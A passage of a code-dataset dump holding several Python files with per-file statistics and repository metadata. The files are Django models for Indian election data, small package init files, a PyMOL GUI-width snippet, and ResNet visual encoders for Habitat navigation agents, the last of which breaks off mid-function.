| 0.954009
| 0.954009
| 0.951927
| 0.951927
| 0.951927
| 0
| 0.012878
| 0.337536
| 29,188
| 870
| 120
| 33.549425
| 0.806889
| 0.035391
| 0
| 0.884719
| 0
| 0
| 0.017277
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08445
| false
| 0
| 0.012064
| 0.021448
| 0.175603
| 0.004021
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7b07e4055655a10c1a68f8d46eeec54fcb8f21c1
| 19,931
|
py
|
Python
|
Lokdhaba_dj/v1/models.py
|
tcpd/Lokdhaba-API-dj
|
a0c306ac405392c2f86f5751ccea27725493f399
|
[
"MIT"
] | 2
|
2021-01-30T07:10:09.000Z
|
2021-08-11T01:10:24.000Z
|
Lokdhaba_dj/v1/models.py
|
tcpd/Lokdhaba-API-dj
|
a0c306ac405392c2f86f5751ccea27725493f399
|
[
"MIT"
] | null | null | null |
Lokdhaba_dj/v1/models.py
|
tcpd/Lokdhaba-API-dj
|
a0c306ac405392c2f86f5751ccea27725493f399
|
[
"MIT"
] | null | null | null |
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey and OneToOneField has `on_delete` set to the desired behavior
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from django.db import models


class Contested_Deposit_Losts(models.Model):
    Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2)  # Field name made lowercase.
    State_Name = models.CharField(db_column='State_Name', max_length=50)  # Field name made lowercase.
    Assembly_No = models.IntegerField(db_column='Assembly_No')  # Field name made lowercase.
    Year = models.IntegerField(db_column='Year')  # Field name made lowercase.
    Total_Candidates = models.IntegerField(db_column='Total_Candidates', blank=True, null=True)  # Field name made lowercase.
    Deposit_Lost = models.IntegerField(db_column='Deposit_Lost', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False
        db_table = 'contested_deposit_losts'
        unique_together = (('Election_Type', 'State_Name', 'Assembly_No'),)


class DjangoMigrations(models.Model):
    app = models.CharField(max_length=255)
    name = models.CharField(max_length=255)
    applied = models.DateTimeField()

    class Meta:
        managed = False
        db_table = 'django_migrations'


class Maps(models.Model):
    Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2)  # Field name made lowercase.
    State_Name = models.CharField(db_column='State_Name', max_length=50)  # Field name made lowercase.
    Assembly_No = models.IntegerField(db_column='Assembly_No')  # Field name made lowercase.
    Year = models.IntegerField(db_column='Year')  # Field name made lowercase.
    Constituency_No = models.IntegerField(db_column='Constituency_No')  # Field name made lowercase.
    Constituency_Name = models.CharField(db_column='Constituency_Name', max_length=50)  # Field name made lowercase.
    Turnout_Percentage = models.DecimalField(db_column='Turnout_Percentage', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    Vote_Share_Percentage = models.DecimalField(db_column='Vote_Share_Percentage', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    Constituency_Type = models.CharField(db_column='Constituency_Type', max_length=50, blank=True, null=True)  # Field name made lowercase.
    Electors = models.IntegerField(db_column='Electors', blank=True, null=True)  # Field name made lowercase.
    N_Cand = models.IntegerField(db_column='N_Cand', blank=True, null=True)  # Field name made lowercase.
    Position = models.IntegerField(db_column='Position')  # Field name made lowercase.
    Sex = models.CharField(db_column='Sex', max_length=10, blank=True, null=True)  # Field name made lowercase.
    Party = models.CharField(db_column='Party', max_length=50)  # Field name made lowercase.
    Votes = models.IntegerField(db_column='Votes', blank=True, null=True)  # Field name made lowercase.
    Candidate = models.CharField(db_column='Candidate', max_length=255)  # Field name made lowercase.
    Margin_Percentage = models.DecimalField(db_column='Margin_Percentage', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    Runner = models.CharField(db_column='Runner', max_length=255, blank=True, null=True)  # Field name made lowercase.
    Runner_Party = models.CharField(db_column='Runner_Party', max_length=50, blank=True, null=True)  # Field name made lowercase.
    Runner_Sex = models.CharField(db_column='Runner_Sex', max_length=10, blank=True, null=True)  # Field name made lowercase.
    Nota_Percentage = models.DecimalField(db_column='Nota_Percentage', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False
        db_table = 'maps'
        unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Constituency_No'),)


class Mastersheet(models.Model):
    Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2)  # Field name made lowercase.
    State_Name = models.CharField(db_column='State_Name', max_length=50)  # Field name made lowercase.
    Assembly_No = models.IntegerField(db_column='Assembly_No')  # Field name made lowercase.
    Constituency_No = models.IntegerField(db_column='Constituency_No')  # Field name made lowercase.
    Year = models.IntegerField(db_column='Year')  # Field name made lowercase.
    month = models.IntegerField(blank=True, null=True)
    Poll_No = models.IntegerField(db_column='Poll_No')  # Field name made lowercase.
    DelimID = models.IntegerField(db_column='DelimID', blank=True, null=True)  # Field name made lowercase.
    Position = models.IntegerField(db_column='Position')  # Field name made lowercase.
    Candidate = models.CharField(db_column='Candidate', max_length=255, blank=True, null=True)  # Field name made lowercase.
    Sex = models.CharField(db_column='Sex', max_length=3, blank=True, null=True)  # Field name made lowercase.
    Party = models.CharField(db_column='Party', max_length=255, blank=True, null=True)  # Field name made lowercase.
    Votes = models.IntegerField(db_column='Votes', blank=True, null=True)  # Field name made lowercase.
    Candidate_Type = models.CharField(db_column='Candidate_Type', max_length=5, blank=True, null=True)  # Field name made lowercase.
    Valid_Votes = models.IntegerField(db_column='Valid_Votes', blank=True, null=True)  # Field name made lowercase.
    Electors = models.IntegerField(db_column='Electors', blank=True, null=True)  # Field name made lowercase.
    Constituency_Name = models.CharField(db_column='Constituency_Name', max_length=255, blank=True, null=True)  # Field name made lowercase.
    Constituency_Type = models.CharField(db_column='Constituency_Type', max_length=10, blank=True, null=True)  # Field name made lowercase.
    Sub_Region = models.CharField(db_column='Sub_Region', max_length=255, blank=True, null=True)  # Field name made lowercase.
    N_Cand = models.IntegerField(db_column='N_Cand', blank=True, null=True)  # Field name made lowercase.
    Turnout_Percentage = models.DecimalField(db_column='Turnout_Percentage', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    Vote_Share_Percentage = models.DecimalField(db_column='Vote_Share_Percentage', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    Deposit_Lost = models.CharField(db_column='Deposit_Lost', max_length=3, blank=True, null=True)  # Field name made lowercase.
    Margin = models.IntegerField(db_column='Margin', blank=True, null=True)  # Field name made lowercase.
    Margin_Percentage = models.DecimalField(db_column='Margin_Percentage', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    ENOP = models.FloatField(db_column='ENOP', blank=True, null=True)  # Field name made lowercase.
    pid = models.CharField(max_length=255, blank=True, null=True)
    Party_Type_TCPD = models.CharField(db_column='Party_Type_TCPD', max_length=255, blank=True, null=True)  # Field name made lowercase.
    Party_ID = models.IntegerField(db_column='Party_ID', blank=True, null=True)  # Field name made lowercase.
    last_poll = models.CharField(max_length=10, blank=True, null=True)
    Contested = models.IntegerField(db_column='Contested', blank=True, null=True)  # Field name made lowercase.
    Last_Party = models.CharField(db_column='Last_Party', max_length=255, blank=True, null=True)  # Field name made lowercase.
    Last_Party_ID = models.IntegerField(db_column='Last_Party_ID', blank=True, null=True)  # Field name made lowercase.
    Last_Constituency_Name = models.CharField(db_column='Last_Constituency_Name', max_length=255, blank=True, null=True)  # Field name made lowercase.
    Same_Constituency = models.CharField(db_column='Same_Constituency', max_length=10, blank=True, null=True)  # Field name made lowercase.
    Same_Party = models.CharField(db_column='Same_Party', max_length=10, blank=True, null=True)  # Field name made lowercase.
    No_Terms = models.IntegerField(db_column='No_Terms', blank=True, null=True)  # Field name made lowercase.
    Turncoat = models.CharField(db_column='Turncoat', max_length=10, blank=True, null=True)  # Field name made lowercase.
    Incumbent = models.CharField(db_column='Incumbent', max_length=10, blank=True, null=True)  # Field name made lowercase.
    Recontest = models.CharField(db_column='Recontest', max_length=10, blank=True, null=True)  # Field name made lowercase.
    Age = models.IntegerField(db_column='Age', blank=True, null=True)  # Field name made lowercase.
    District_Name = models.CharField(db_column='District_Name', max_length=255, blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False
        db_table = 'mastersheet'
        unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Constituency_No', 'Poll_No', 'Position'),)


class Parties_Contests(models.Model):
    Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2)  # Field name made lowercase.
    State_Name = models.CharField(db_column='State_Name', max_length=50)  # Field name made lowercase.
    Assembly_No = models.IntegerField(db_column='Assembly_No')  # Field name made lowercase.
    Year = models.IntegerField(db_column='Year')  # Field name made lowercase.
    Parties_Contested = models.IntegerField(db_column='Parties_Contested', blank=True, null=True)  # Field name made lowercase.
    Parties_Represented = models.IntegerField(db_column='Parties_Represented', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False
        db_table = 'parties_contests'
        unique_together = (('Election_Type', 'State_Name', 'Assembly_No'),)


class Party_Statistics(models.Model):
    Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2)  # Field name made lowercase.
    State_Name = models.CharField(db_column='State_Name', max_length=50)  # Field name made lowercase.
    Assembly_No = models.IntegerField(db_column='Assembly_No')  # Field name made lowercase.
    Year = models.IntegerField(db_column='Year')  # Field name made lowercase.
    Party = models.CharField(db_column='Party', max_length=50)  # Field name made lowercase.
    Total_Seats_in_Assembly = models.IntegerField(db_column='Total_Seats_in_Assembly')  # Field name made lowercase.
    Total_Votes_in_Assembly = models.IntegerField(db_column='Total_Votes_in_Assembly')  # Field name made lowercase.
    Total_Votes_in_Contested_Seats = models.IntegerField(db_column='Total_Votes_in_Contested_Seats')  # Field name made lowercase.
    Total_Candidates = models.IntegerField(db_column='Total_Candidates', blank=True, null=True)  # Field name made lowercase.
    Winners = models.IntegerField(db_column='Winners')  # Field name made lowercase.
    Deposit_Lost = models.IntegerField(db_column='Deposit_Lost', blank=True, null=True)  # Field name made lowercase.
    Strike_Rate = models.DecimalField(db_column='Strike_Rate', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    Seat_Share = models.DecimalField(db_column='Seat_Share', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    Vote_Share_in_Assembly = models.DecimalField(db_column='Vote_Share_in_Assembly', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    Vote_Share_in_Contested_Seats = models.DecimalField(db_column='Vote_Share_in_Contested_Seats', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    Position = models.IntegerField(blank=True, null=True)
    Expanded_Party_Name = models.CharField(db_column='Expanded_Party_Name', max_length=50, blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False
        db_table = 'party_statistics'
        unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Party'),)


class Partys(models.Model):
    Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2)  # Field name made lowercase.
    State_Name = models.CharField(db_column='State_Name', max_length=50)  # Field name made lowercase.
    Assembly_No = models.IntegerField(db_column='Assembly_No')  # Field name made lowercase.
    Year = models.IntegerField(db_column='Year')  # Field name made lowercase.
    Constituency_No = models.IntegerField(db_column='Constituency_No')  # Field name made lowercase.
    Constituency_Name = models.CharField(db_column='Constituency_Name', max_length=50)  # Field name made lowercase.
    Vote_Share_Percentage = models.DecimalField(db_column='Vote_Share_Percentage', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    Constituency_Type = models.CharField(db_column='Constituency_Type', max_length=50, blank=True, null=True)  # Field name made lowercase.
    Position = models.IntegerField(db_column='Position')  # Field name made lowercase.
    Party = models.CharField(db_column='Party', max_length=50)  # Field name made lowercase.
    Votes = models.IntegerField(db_column='Votes', blank=True, null=True)  # Field name made lowercase.
    Candidate = models.CharField(db_column='Candidate', max_length=255)  # Field name made lowercase.

    class Meta:
        managed = False
        db_table = 'partys'
        unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Constituency_No', 'Position'),)


class Partysummary(models.Model):
    Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2)  # Field name made lowercase.
    State_Name = models.CharField(db_column='State_Name', max_length=50)  # Field name made lowercase.
    Assembly_No = models.IntegerField(db_column='Assembly_No')  # Field name made lowercase.
    Year = models.IntegerField(db_column='Year')  # Field name made lowercase.
    Party = models.CharField(db_column='Party', max_length=50)  # Field name made lowercase.
    Total_Cand = models.IntegerField(db_column='Total_Cand', blank=True, null=True)  # Field name made lowercase.
    Winners = models.IntegerField(db_column='Winners')  # Field name made lowercase.
    Deposit_Lost = models.IntegerField(db_column='Deposit_Lost', blank=True, null=True)  # Field name made lowercase.
    Avg_Winning_Margin = models.DecimalField(db_column='Avg_Winning_Margin', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    Strike_Rate = models.DecimalField(db_column='Strike_Rate', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    Position = models.IntegerField(blank=True, null=True)

    class Meta:
        managed = False
        db_table = 'partysummary'
        unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Party'),)


class Seatshares(models.Model):
    Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2)  # Field name made lowercase.
    State_Name = models.CharField(db_column='State_Name', max_length=50)  # Field name made lowercase.
    Assembly_No = models.IntegerField(db_column='Assembly_No')  # Field name made lowercase.
    Year = models.IntegerField(db_column='Year')  # Field name made lowercase.
    Party = models.CharField(db_column='Party', max_length=50)  # Field name made lowercase.
    partyseats = models.IntegerField(blank=True, null=True)
    totalseats = models.IntegerField(blank=True, null=True)
    Seats = models.DecimalField(db_column='Seats', max_digits=4, decimal_places=2, blank=True, null=True)  # Field name made lowercase.
    Position = models.IntegerField(blank=True, null=True)

    class Meta:
        managed = False
        db_table = 'seatshares'
        unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Party'),)


class Voter_Turnout(models.Model):
    Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2)  # Field name made lowercase.
    State_Name = models.CharField(db_column='State_Name', max_length=50)  # Field name made lowercase.
    Assembly_No = models.IntegerField(db_column='Assembly_No')  # Field name made lowercase.
    Year = models.IntegerField(db_column='Year')  # Field name made lowercase.
    male = models.DecimalField(max_digits=4, decimal_places=2, blank=True, null=True)
    female = models.DecimalField(max_digits=4, decimal_places=2, blank=True, null=True)
    total = models.DecimalField(max_digits=4, decimal_places=2, blank=True, null=True)

    class Meta:
        managed = False
        db_table = 'voter_turnout'
        unique_together = (('Election_Type', 'State_Name', 'Assembly_No'),)


class Voteshares_Cont(models.Model):
    Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2)  # Field name made lowercase.
    State_Name = models.CharField(db_column='State_Name', max_length=50)  # Field name made lowercase.
    Assembly_No = models.IntegerField(db_column='Assembly_No')  # Field name made lowercase.
    Year = models.IntegerField(db_column='Year')  # Field name made lowercase.
    Party = models.CharField(db_column='Party', max_length=50)  # Field name made lowercase.
    partyvotes = models.IntegerField(blank=True, null=True)
totalvotes = models.IntegerField(blank=True, null=True)
Vote_Share_Percentage = models.DecimalField(db_column='Vote_Share_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Position = models.IntegerField(blank=True, null=True)
class Meta:
managed = False
db_table = 'voteshares_cont'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Party'),)
class Voteshares_Total(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
Party = models.CharField(db_column='Party', max_length=50) # Field name made lowercase.
Vote_Share_Percentage = models.DecimalField(db_column='Vote_Share_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Position = models.IntegerField(blank=True, null=True)
class Meta:
managed = False
db_table = 'voteshares_total'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Party'),)
class Womens(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
Women_Percentage = models.DecimalField(db_column='Women_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'womens'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No'),)
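Because these models are read-only reflections (managed = False), typical use is plain ORM querying against the existing tables. A minimal sketch, assuming a configured Django project in which the models live at the hypothetical path myapp.models; the filter values are also hypothetical:

from myapp.models import Party_Statistics  # hypothetical app path

# Top five parties by seat share for one state assembly.
top_parties = (
    Party_Statistics.objects
    .filter(Election_Type='AE', State_Name='Goa', Assembly_No=7)
    .order_by('-Seat_Share')[:5]
)
for row in top_parties:
    print(row.Party, row.Winners, row.Seat_Share)

Note that inspectdb marks only Election_Type as primary_key; the real row identity is the unique_together tuple, which is fine for reads but means .get() lookups should filter on all of those columns.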
| 74.64794
| 183
| 0.746375
| 2,683
| 19,931
| 5.333582
| 0.062244
| 0.07659
| 0.124458
| 0.210622
| 0.893571
| 0.839902
| 0.819078
| 0.801328
| 0.787282
| 0.762264
| 0
| 0.009784
| 0.143646
| 19,931
| 266
| 184
| 74.928571
| 0.828627
| 0.209172
| 0
| 0.6
| 1
| 0
| 0.14068
| 0.017737
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004545
| 0
| 0.827273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
7b10ce1380102a8b4a1268e759d954ab7aaf7c93
| 73
|
py
|
Python
|
chimera/auth/__init__.py
|
sjklein92/senior-design
|
52d11e5c5fa45397b4e873bdc070f9caa28c0baa
|
[
"MIT"
] | null | null | null |
chimera/auth/__init__.py
|
sjklein92/senior-design
|
52d11e5c5fa45397b4e873bdc070f9caa28c0baa
|
[
"MIT"
] | null | null | null |
chimera/auth/__init__.py
|
sjklein92/senior-design
|
52d11e5c5fa45397b4e873bdc070f9caa28c0baa
|
[
"MIT"
] | null | null | null |
from chimera.auth.models import *
from chimera.auth.controllers import *
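The two wildcard imports re-export everything public from the submodules, so callers can write from chimera.auth import <name>. A sketch of the more explicit equivalent, using hypothetical member names (User, login_controller) since the submodules' contents are not shown:

# Explicit re-exports make the package's public surface visible at a glance.
from chimera.auth.models import User                    # hypothetical name
from chimera.auth.controllers import login_controller   # hypothetical name

__all__ = ['User', 'login_controller']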
| 24.333333
| 38
| 0.808219
| 10
| 73
| 5.9
| 0.6
| 0.372881
| 0.508475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 73
| 2
| 39
| 36.5
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9e7859334876ad8a7a0f722113f3f464813ded77
| 263
|
py
|
Python
|
models/__init__.py
|
bluedaemondev/employees_objective
|
385390b18fedeeb56ba75b2ecdca295f4cca0bc5
|
[
"MIT"
] | 1
|
2020-01-13T23:27:16.000Z
|
2020-01-13T23:27:16.000Z
|
models/__init__.py
|
bluedaemondev/employees_objective
|
385390b18fedeeb56ba75b2ecdca295f4cca0bc5
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
bluedaemondev/employees_objective
|
385390b18fedeeb56ba75b2ecdca295f4cca0bc5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# EYNES Ing. de Software @2019 (Juan Lanosa). See LICENSE file for full copyright and licensing details.
from . import employee_objective
#from . import employee_objective_panel
#from . import sale_order
#from . import objective_worklog
| 29.222222
| 104
| 0.760456
| 36
| 263
| 5.416667
| 0.75
| 0.205128
| 0.184615
| 0.276923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022422
| 0.152091
| 263
| 8
| 105
| 32.875
| 0.852018
| 0.825095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7b3fb3f881829612fabc73ac3b90bcc61e35e476
| 203
|
py
|
Python
|
Workshop/internalGUIwidth.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
Workshop/internalGUIwidth.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
Workshop/internalGUIwidth.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
# Description: Set the width of the internal gui. Set to 0 to make the internal gui vanish.
# Source: placeHolder
"""
cmd.do('set internal_gui_width=${1:0};')
"""
cmd.do('set internal_gui_width=0;')
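The same setting can be changed without building a command string, via PyMOL's cmd.set API. A small sketch; the width values are arbitrary examples:

from pymol import cmd

def set_gui_width(width: int = 0) -> None:
    """Resize PyMOL's internal GUI panel; 0 hides it entirely."""
    cmd.set('internal_gui_width', width)

set_gui_width(300)  # widen the panel
set_gui_width(0)    # make it vanish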
| 22.555556
| 92
| 0.699507
| 34
| 203
| 4.058824
| 0.470588
| 0.318841
| 0.202899
| 0.231884
| 0.347826
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0.023256
| 0.152709
| 203
| 8
| 93
| 25.375
| 0.77907
| 0.753695
| 0
| 0
| 0
| 0
| 0.609756
| 0.512195
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7b518d3b6a495cd841af4342353601ef1b627e21
| 13,108
|
py
|
Python
|
habitat_baselines/il/common/encoders/resnet_encoders.py
|
Ram81/habitat-imitation-baselines
|
c6e11c8ebadbf1260e1bed58a5b8dfb7faf6a505
|
[
"MIT"
] | null | null | null |
habitat_baselines/il/common/encoders/resnet_encoders.py
|
Ram81/habitat-imitation-baselines
|
c6e11c8ebadbf1260e1bed58a5b8dfb7faf6a505
|
[
"MIT"
] | null | null | null |
habitat_baselines/il/common/encoders/resnet_encoders.py
|
Ram81/habitat-imitation-baselines
|
c6e11c8ebadbf1260e1bed58a5b8dfb7faf6a505
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as models
from gym import spaces
from habitat import logger
from habitat_baselines.utils.common import Flatten
from habitat_baselines.rl.ddppo.policy import resnet
from habitat_baselines.rl.ddppo.policy.resnet_policy import ResNetEncoder
class VlnResnetDepthEncoder(nn.Module):
def __init__(
self,
observation_space,
output_size=128,
checkpoint="NONE",
backbone="resnet50",
resnet_baseplanes=32,
normalize_visual_inputs=False,
trainable=False,
spatial_output: bool = False,
):
super().__init__()
self.visual_encoder = ResNetEncoder(
spaces.Dict({"depth": observation_space.spaces["depth"]}),
baseplanes=resnet_baseplanes,
ngroups=resnet_baseplanes // 2,
make_backbone=getattr(resnet, backbone),
normalize_visual_inputs=normalize_visual_inputs,
)
for param in self.visual_encoder.parameters():
param.requires_grad_(trainable)
if checkpoint != "NONE":
ddppo_weights = torch.load(checkpoint)
weights_dict = {}
for k, v in ddppo_weights["state_dict"].items():
split_layer_name = k.split(".")[2:]
if split_layer_name[0] != "visual_encoder":
continue
layer_name = ".".join(split_layer_name[1:])
weights_dict[layer_name] = v
del ddppo_weights
self.visual_encoder.load_state_dict(weights_dict, strict=True)
self.spatial_output = spatial_output
if not self.spatial_output:
self.output_shape = (output_size,)
self.visual_fc = nn.Sequential(
Flatten(),
nn.Linear(np.prod(self.visual_encoder.output_shape), output_size),
nn.ReLU(True),
)
else:
self.spatial_embeddings = nn.Embedding(
self.visual_encoder.output_shape[1]
* self.visual_encoder.output_shape[2],
64,
)
self.output_shape = list(self.visual_encoder.output_shape)
self.output_shape[0] += self.spatial_embeddings.embedding_dim
self.output_shape = tuple(self.output_shape)
def forward(self, observations):
"""
Args:
observations: [BATCH, HEIGHT, WIDTH, CHANNEL]
Returns:
[BATCH, OUTPUT_SIZE]
"""
obs_depth = observations["depth"]
if len(obs_depth.size()) == 5:
observations["depth"] = obs_depth.contiguous().view(
-1, obs_depth.size(2), obs_depth.size(3), obs_depth.size(4)
)
if "depth_features" in observations:
x = observations["depth_features"]
else:
x = self.visual_encoder(observations)
if self.spatial_output:
b, c, h, w = x.size()
spatial_features = (
self.spatial_embeddings(
torch.arange(
0,
self.spatial_embeddings.num_embeddings,
device=x.device,
dtype=torch.long,
)
)
.view(1, -1, h, w)
.expand(b, self.spatial_embeddings.embedding_dim, h, w)
)
return torch.cat([x, spatial_features], dim=1)
else:
return self.visual_fc(x)
class ResnetRGBEncoder(nn.Module):
def __init__(
self,
observation_space,
output_size=256,
backbone="resnet50",
resnet_baseplanes=32,
normalize_visual_inputs=False,
trainable=False,
spatial_output: bool = False,
):
super().__init__()
# Channel count of the RGB sensor; consulted by the is_blind property below,
# which otherwise reads an attribute that is never set.
self._n_input_rgb = observation_space.spaces["rgb"].shape[2] if "rgb" in observation_space.spaces else 0
backbone_split = backbone.split("_")
logger.info("backbone: {}".format(backbone_split))
make_backbone = getattr(resnet, backbone_split[0])
self.visual_encoder = ResNetEncoder(
spaces.Dict({"rgb": observation_space.spaces["rgb"]}),
baseplanes=resnet_baseplanes,
ngroups=resnet_baseplanes // 2,
make_backbone=make_backbone,
normalize_visual_inputs=normalize_visual_inputs,
)
for param in self.visual_encoder.parameters():
param.requires_grad_(trainable)
self.spatial_output = spatial_output
if not self.spatial_output:
self.output_shape = (output_size,)
self.visual_fc = nn.Sequential(
Flatten(),
nn.Linear(np.prod(self.visual_encoder.output_shape), output_size),
nn.ReLU(True),
)
else:
self.spatial_embeddings = nn.Embedding(
self.visual_encoder.output_shape[1]
* self.visual_encoder.output_shape[2],
64,
)
self.output_shape = list(self.visual_encoder.output_shape)
self.output_shape[0] += self.spatial_embeddings.embedding_dim
self.output_shape = tuple(self.output_shape)
@property
def is_blind(self):
return self._n_input_rgb == 0
def forward(self, observations):
"""
Args:
observations: [BATCH, HEIGHT, WIDTH, CHANNEL]
Returns:
[BATCH, OUTPUT_SIZE]
"""
obs_rgb = observations["rgb"]
if len(obs_rgb.size()) == 5:
observations["rgb"] = obs_rgb.contiguous().view(
-1, obs_rgb.size(2), obs_rgb.size(3), obs_rgb.size(4)
)
if "rgb_features" in observations:
x = observations["rgb_features"]
else:
x = self.visual_encoder(observations)
if self.spatial_output:
b, c, h, w = x.size()
spatial_features = (
self.spatial_embeddings(
torch.arange(
0,
self.spatial_embeddings.num_embeddings,
device=x.device,
dtype=torch.long,
)
)
.view(1, -1, h, w)
.expand(b, self.spatial_embeddings.embedding_dim, h, w)
)
return torch.cat([x, spatial_features], dim=1)
else:
return self.visual_fc(x)
class ResnetSemSeqEncoder(nn.Module):
def __init__(
self,
observation_space,
output_size=256,
backbone="resnet18",
resnet_baseplanes=32,
normalize_visual_inputs=False,
trainable=False,
spatial_output: bool = False,
semantic_embedding_size=4,
use_pred_semantics=False,
use_goal_seg=False,
is_thda=False,
):
super().__init__()
# Mirrors the RGB encoder: the is_blind property below expects _n_input_rgb to exist.
self._n_input_rgb = observation_space.spaces["rgb"].shape[2] if "rgb" in observation_space.spaces else 0
if not use_goal_seg:
sem_input_size = 40 + 2
self.semantic_embedder = nn.Embedding(sem_input_size, semantic_embedding_size)
self.visual_encoder = ResNetEncoder(
spaces.Dict({"semantic": observation_space.spaces["semantic"]}),
baseplanes=resnet_baseplanes,
ngroups=resnet_baseplanes // 2,
make_backbone=getattr(resnet, backbone),
normalize_visual_inputs=normalize_visual_inputs,
sem_embedding_size=semantic_embedding_size,
)
for param in self.visual_encoder.parameters():
